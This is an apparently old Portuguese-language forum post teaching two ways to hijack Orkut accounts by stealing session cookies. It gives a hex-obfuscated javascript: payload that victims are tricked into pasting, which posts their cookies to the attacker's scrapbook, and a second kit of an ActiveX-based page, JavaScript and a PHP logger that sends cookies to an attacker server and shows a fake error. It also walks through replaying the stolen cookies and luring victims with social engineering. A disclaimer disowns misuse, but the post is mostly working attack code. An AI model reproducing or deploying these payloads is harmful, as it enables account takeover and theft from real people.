ATENÇÃO: APESAR DE O TEXTO ESTAR ESCRITO NO MODO VERBAL IMPERATIVO, NÃO ESTOU INDUZINDO NINGUEM A REPETIR AS AÇÕES AQUI DECLARADAS. REPROVO O ATO BLACK-HAT, LAMER E SCRIPT-KID E EM MOMENTO ALGUM VOCÊ DEVE UTILIZAR O CONHECIMENTO PARA O MAL.
Eu sei que é coisa de lamer, mas quem nunca invadiu uma conta do Orkut pelo método deles (aquele de criar o e-mail inexistente)?
Vou postar aqui duas maneiras de se invadir uma conta do Orkut via cookies.
Os cookies são pequenos arquivos de texto salvos no seu computador para que os sites lhe reconheçam quando você se conectar novamente a eles. Isto é visto quando você fecha seu navegador e, quando o abre, seu orkut está logado.
Mas, com a insegurança do Internet Explorer, e o mal-desenvolvimento e administração de cookies do Orkut lhe dá a possibilidade de estar na conta desta pessoa, apenas copiando os cookies para si.
Mas quem iria na casa da pessoa, mesmo que com engenharia social (lábia), para copiar os cookies para um pendrive? Não sei.
Mas (3 "mas" seguidos kkk) para este feito, a vítima precisa usar o Internet Explorer (ou, como eu prefiro chamar, ieca) e você estar usando o Mozilla Firefox, com um add-on que possibilite a alteração de cookies (recomendo este Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
Método 1
Com este método, a pessoa injetará o código JavaScript em seu navegador. Veja o código que ela deverá colar na barra de endereço e apertar "Enter".
Código:
javascript:document.body.innerHTML+='<iframe name="flood" width="0" height="0" frameborder="0"></iframe>';function redre(){setTimeout("location.href=\"%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78\";", 2000)};flood.location="%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78";dscrap=document.getElementById('scrapText');setTimeout('df=flood.document.forms[1];df.innerHTML+=\'<input type="submit" name="Action.submit">\';df.action="%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%6B%75%74%2E%63%6F%6D%2F%53%63%72%61%70%62%6F%6F%6B%2E%61%73%70%78%3F%75%69%64%3DAQUI O ENDEREÇO DE SEU PERFIL";flood.document.getElementById(\'scrapText\').value=document.cookie;flood.document.getElementsByTagName(\'input\')[\'Action.submit\'].click();redre();', 3000);void(0)
Ao ter certeza de que o código foi executado, abra sua página de recados e veja que os cookies colocados pelo Orkut, no computador da pessoa, foram enviados para lá. Assim, basta copiar o que se encontra após "ORKUTPREF=ID=" para a área de transferência.
Agora, abra o seu editor de cookies (add-on) e procure pelo cookie "orkut_state". Após isso, veja que há a chave "ORKUTPREF=ID=". Modifique-a, com o conteúdo colocado na área de transferência. Clique em Salvar, e depois em Fechar.
Agora, clique em "Início" e veja o que acontece.
Lembre-se que o código não produz ação visível. Portanto, coloque a criatividade para funcionar. Adicione mais códigos (JavaScript) que façam coisas legais, como um alert() com uma mensagem bonita ou algo assim.
Método 2
Já para este método, você terá que usar engenharia social para fazer com que a vítima clique no seu link. Você deve ter um serviço de hospedagem HTTP com PHP (como o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., que é gratuito). Também é possível utilizar um script que disponibilizei há um tempo, que faz com que seu scrap seja repassado automaticamente (procure por 0KaL no fórum, lembrando que o primeiro caractere não é a letra O, e sim o número 0). Assim, teremos 5 arquivos:
- index.htm
- sv.js
- sv.php
- hackeds.txt
- end.htm
Então, vamos aos códigos:
index.htm
Código HTML:
<body onload="setTimeout('vipz.DOM.body.innerHTML=\'n\'');setTimeout('main()',500)"> <object id="vipz" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0" align="middle"> <PARAM NAME="ActivateApplets" VALUE="1"> <PARAM NAME="ActivateActiveXControls" VALUE="1"> </object> <SCRIPT src="sv.js"> </SCRIPT>
Código HTML:
function shellscript() { window.name="poorchild";open("http://www.orkut.com/About.aspx","poorchild"); } function main() {vipz.DOM.Script.execScript(shellscript.toString()); vipz.DOM.Script.setTimeout("shellscript()"); var myloc=vipz.DOM.location.href;setTimeout('vipz.DOM.Script.execScript ("window.location.href=\'sv.php?sv=\' + escape(document.cookie);")',2000); }
Código PHP:
<?php
$cookies = addslashes($_GET['sv']);
$saving = fopen("hackeds.txt", "a+");
fwrite($saving, $cookies."
-----------
");
fclose($saving);
header("location: end.htm");
?>
Este arquivo irá salvar os dados obtidos, portanto, deverá ser em branco.
end.htm
Este arquivo será a página final. Com a criatividade em jogo, invente um erro bem convincente.
Faz bem saber que este último método funciona com uma vasta quantidade de sites, inclusive o fotolog.
Agora, fim de códigos. O processo a partir daqui, de modificação dos seus prórprios cookies, substituindo-os pelos da vítima, será semelhante ao do método 1.
ATENÇÃO: APESAR DE O TEXTO ESTAR ESCRITO NO MODO VERBAL IMPERATIVO, NÃO ESTOU INDUZINDO NINGUEM A REPETIR AS AÇÕES AQUI DECLARADAS. REPROVO O ATO BLACK-HAT, LAMER E SCRIPT-KID E EM MOMENTO ALGUM VOCÊ DEVE UTILIZAR O CONHECIMENTO PARA O MAL.
Até a próxima!
Comment